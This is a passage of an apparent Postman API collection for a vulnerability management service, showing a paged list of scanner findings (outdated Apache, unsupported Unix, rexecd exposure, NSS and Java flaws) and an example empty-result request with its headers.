9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T02:50:24\",\n            \"last_seen_date\": \"2017-09-18T02:50:24\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Apache 2.2.x < 2.2.13 APR apr_palloc Heap Overflow\",\n            \"description\": \"\\nAccording to its self-reported banner, the version of Apache 2.2.x running on the remote host is prior to 2.2.13. As such, it includes a bundled version of the Apache Portable Runtime (APR) library that contains a flaw in 'apr_palloc()' that could cause a heap overflow. \\n\\nNote that the Apache HTTP server itself does not pass unsanitized, user-provided sizes to this function so it could only be triggered through some other application that uses it in a vulnerable way.\",\n            \"severity\": 4,\n            \"asset\": \"5d024cf1c569d5025016dc31\",\n            \"port\": 443,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5d024cf1c569d5025016dc5b\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"cves\": [\n                \"5cec2343c569d52c0f2e2df8\"\n            ],\n            \"cwes\": [\n                \"5cec2343c569d52c0f2e2df8\"\n            ],\n            \"issue_id\": \"5d024cf2c569d5025016dc9e\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T02:41:58\",\n            \"last_seen_date\": \"2017-09-18T02:41:58\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Apache 2.2.x < 2.2.15 Multiple Vulnerabilities\",\n            \"description\": \"\\nAccording to its banner, the version of Apache 2.2.x running on the remote host is prior to 2.2.15. It is, therefore, potentially affected by multiple vulnerabilities :\\n\\n  - A TLS renegotiation prefix injection attack is possible.     (CVE-2009-3555)\\n\\n  - The 'mod_proxy_ajp' module returns the wrong status code     if it encounters an error which causes the back-end     server to be put into an error state. (CVE-2010-0408)\\n\\n  - The 'mod_isapi' attempts to unload the 'ISAPI.dll' when     it encounters various error states which could leave     call-backs in an undefined state. (CVE-2010-0425)\\n\\n  - A flaw in the core sub-request process code can lead to     sensitive information from a request being handled by     the wrong thread if a multi-threaded environment is     used. (CVE-2010-0434)\\n\\n  - Added 'mod_reqtimeout' module to mitigate Slowloris     attacks. (CVE-2007-6750)\",\n            \"severity\": 4,\n            \"asset\": \"5d024cf1c569d5025016dc31\",\n            \"port\": 443,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5d024cf1c569d5025016dc41\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"cves\": [\n                \"5cec2343c569d52c0f2e2e08\",\n                \"5c802682c569d5745fa204eb\"\n            ],\n            \"cwes\": [\n                \"5cec2343c569d52c0f2e2e08\",\n                \"5c802682c569d5745fa204eb\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://archive.apache.org/dist/\",\n                    \"title\": \"archive.apache.org\"\n                },\n                {\n                    \"url\": \"https://issues.apache.org/bugzilla/show_bug.cgi?id=48359\\n\",\n                    \"title\": \"issues.apache.org\"\n                }\n            ],\n            \"issue_id\": \"5d024cf2c569d5025016dc7a\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T02:41:58\",\n            \"last_seen_date\": \"2017-09-18T02:41:58\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2552\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec243cc569d52c0f2e811f\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:28:45\",\n            \"last_seen_date\": \"2019-05-06T16:28:45\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e24d8\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2433c569d52c0f2e7f15\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:33:47\",\n            \"last_seen_date\": \"2019-05-06T16:33:47\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2519\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2433c569d52c0f2e7f0f\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:28:37\",\n            \"last_seen_date\": \"2019-05-06T16:28:37\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e24f5\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2433c569d52c0f2e7dec\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:29:01\",\n            \"last_seen_date\": \"2019-05-06T16:29:01\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e24f8\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2433c569d52c0f2e7d9c\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:28:50\",\n            \"last_seen_date\": \"2019-05-06T16:28:50\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e254f\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec242ac569d52c0f2e7b60\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-07T14:55:03\",\n            \"last_seen_date\": \"2019-05-07T14:55:03\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"rexecd Service Detection\",\n            \"description\": \"\\nThe rexecd service is running on the remote host. This service is design to allow users of a network to execute commands remotely.\\nHowever, rexecd does not provide any good means of authentication, so it may be abused by an attacker to scan a third-party host.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e24ff\",\n            \"port\": 512,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5c802689c569d5745fa20d11\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5cec242ac569d52c0f2e7a1b\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:38:26\",\n            \"last_seen_date\": \"2019-05-06T16:38:26\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2504\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2429c569d52c0f2e7974\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:31:05\",\n            \"last_seen_date\": \"2019-05-06T16:31:05\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2511\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2429c569d52c0f2e7956\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:28:18\",\n            \"last_seen_date\": \"2019-05-06T16:28:18\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2506\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2429c569d52c0f2e78f4\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:31:59\",\n            \"last_seen_date\": \"2019-05-06T16:31:59\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e24cd\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec241fc569d52c0f2e7595\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:28:22\",\n            \"last_seen_date\": \"2019-05-06T16:28:22\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e24eb\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2416c569d52c0f2e7392\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:28:55\",\n            \"last_seen_date\": \"2019-05-06T16:28:55\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"rexecd Service Detection\",\n            \"description\": \"\\nThe rexecd service is running on the remote host. This service is design to allow users of a network to execute commands remotely.\\nHowever, rexecd does not provide any good means of authentication, so it may be abused by an attacker to scan a third-party host.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e24c6\",\n            \"port\": 512,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5c802689c569d5745fa20d11\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5cec240dc569d52c0f2e6fc9\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:36:20\",\n            \"last_seen_date\": \"2019-05-06T16:36:20\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2501\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec2403c569d52c0f2e69da\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:34:20\",\n            \"last_seen_date\": \"2019-05-06T16:34:20\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"rexecd Service Detection\",\n            \"description\": \"\\nThe rexecd service is running on the remote host. This service is design to allow users of a network to execute commands remotely.\\nHowever, rexecd does not provide any good means of authentication, so it may be abused by an attacker to scan a third-party host.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e252d\",\n            \"port\": 512,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5c802689c569d5745fa20d11\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5cec2403c569d52c0f2e6933\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:35:38\",\n            \"last_seen_date\": \"2019-05-06T16:35:38\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2525\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec23f9c569d52c0f2e65e2\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:34:02\",\n            \"last_seen_date\": \"2019-05-06T16:34:02\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2512\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec23f9c569d52c0f2e65da\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:31:25\",\n            \"last_seen_date\": \"2019-05-06T16:31:25\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its self-reported version number, the Unix operating system running on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2510\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91790e12f5e05704b90f0\"\n            ],\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5cec23f9c569d52c0f2e65c7\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:31:19\",\n            \"last_seen_date\": \"2019-05-06T16:31:19\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"rexecd Service Detection\",\n            \"description\": \"\\nThe rexecd service is running on the remote host. This service is design to allow users of a network to execute commands remotely.\\nHowever, rexecd does not provide any good means of authentication, so it may be abused by an attacker to scan a third-party host.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e253c\",\n            \"port\": 512,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5c802689c569d5745fa20d11\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5cec23f9c569d52c0f2e655a\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:36:10\",\n            \"last_seen_date\": \"2019-05-06T16:36:10\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"rexecd Service Detection\",\n            \"description\": \"\\nThe rexecd service is running on the remote host. This service is design to allow users of a network to execute commands remotely.\\nHowever, rexecd does not provide any good means of authentication, so it may be abused by an attacker to scan a third-party host.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e255a\",\n            \"port\": 512,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5c802689c569d5745fa20d11\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5cec23f9c569d52c0f2e6503\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T17:03:19\",\n            \"last_seen_date\": \"2019-05-06T17:03:19\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"rexecd Service Detection\",\n            \"description\": \"\\nThe rexecd service is running on the remote host. This service is design to allow users of a network to execute commands remotely.\\nHowever, rexecd does not provide any good means of authentication, so it may be abused by an attacker to scan a third-party host.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2556\",\n            \"port\": 512,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5c802689c569d5745fa20d11\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5cec23f8c569d52c0f2e6430\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T17:08:15\",\n            \"last_seen_date\": \"2019-05-06T17:08:15\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"rexecd Service Detection\",\n            \"description\": \"\\nThe rexecd service is running on the remote host. This service is design to allow users of a network to execute commands remotely.\\nHowever, rexecd does not provide any good means of authentication, so it may be abused by an attacker to scan a third-party host.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2557\",\n            \"port\": 512,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5c802689c569d5745fa20d11\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5cec23f8c569d52c0f2e6423\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T17:08:33\",\n            \"last_seen_date\": \"2019-05-06T17:08:33\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : nss vulnerability (USN-2343-1)\",\n            \"description\": \"\\nTyson Smith and Jesse Schwartzentruber discovered that NSS contained a race condition when performing certificate validation. An attacker could use this issue to cause NSS to crash, resulting in a denial of service, or possibly execute arbitrary code.\\n\\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2510\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5cec232ec569d52c0f2e2582\"\n            ],\n            \"categories\": [\n                \"5cec232ec569d52c0f2e2561\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://usn.ubuntu.com/2343-1/\",\n                    \"title\": \"usn.ubuntu.com\"\n                }\n            ],\n            \"issue_id\": \"5cec23f0c569d52c0f2e6408\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:31:19\",\n            \"last_seen_date\": \"2019-05-06T16:31:19\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Oracle Java SE Multiple Vulnerabilities (July 2014 CPU) (Unix)\",\n            \"description\": \"\\nThe version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is prior to 8 Update 11, 7 Update 65, 6 Update 81, or 5 Update 71. It is, therefore, affected by security issues in the following components :\\n\\n  - Deployment\\n  - Hotspot\\n  - JavaFX\\n  - JMX\\n  - Libraries\\n  - Security\\n  - Serviceability\\n  - Swing\",\n            \"severity\": 4,\n            \"asset\": \"5cec232ec569d52c0f2e2515\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5cec23efc569d52c0f2e623d\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39caba\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"http://www.nessus.org/u?726f7054\\n\",\n                    \"title\": \"www.nessus.org\"\n                },\n                {\n                    \"url\": \"http://www.nessus.org/u?84f3023c\",\n                    \"title\": \"www.nessus.org\"\n                },\n                {\n                    \"url\": \"http://www.nessus.org/u?4743a1ef\\n\",\n                    \"title\": \"www.nessus.org\"\n                },\n                {\n                    \"url\": \"http://www.nessus.org/u?81911044\\n\",\n                    \"title\": \"www.nessus.org\"\n                },\n                {\n                    \"url\": \"http://www.nessus.org/u?39cb260f\\n\",\n                    \"title\": \"www.nessus.org\"\n                }\n            ],\n            \"issue_id\": \"5cec23f0c569d52c0f2e63ec\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2019-05-06T16:32:17\",\n            \"last_seen_date\": \"2019-05-06T16:32:17\"\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"totalPages\": 19,\n    \"totalElements\": 552,\n    \"last\": false,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 30,\n    \"size\": 30,\n    \"number\": 0\n}"},{"id":"b03e80ea-43c8-4188-af54-d08b927f05f4","name":"No Results Found","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"creation_date\": {\n\t\t\"operator\": \"btw\",\n\t\t\"values\": [\"2019-06-01T00:00:00\", \"2019-06-30T23:59:59\"]\n\t}\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/issues?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","issues"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 21:13:45 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01q4po6d1jsl8haxng295oinod5110.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01latuguz8jda41fvj8023wf7ux5153.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=ab9f3f12-0179-4eec-81c2-07184bec7504;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01latuguz8jda41fvj8023wf7ux5153.node0","key":"JSESSIONID"},{"expires":"Invalid 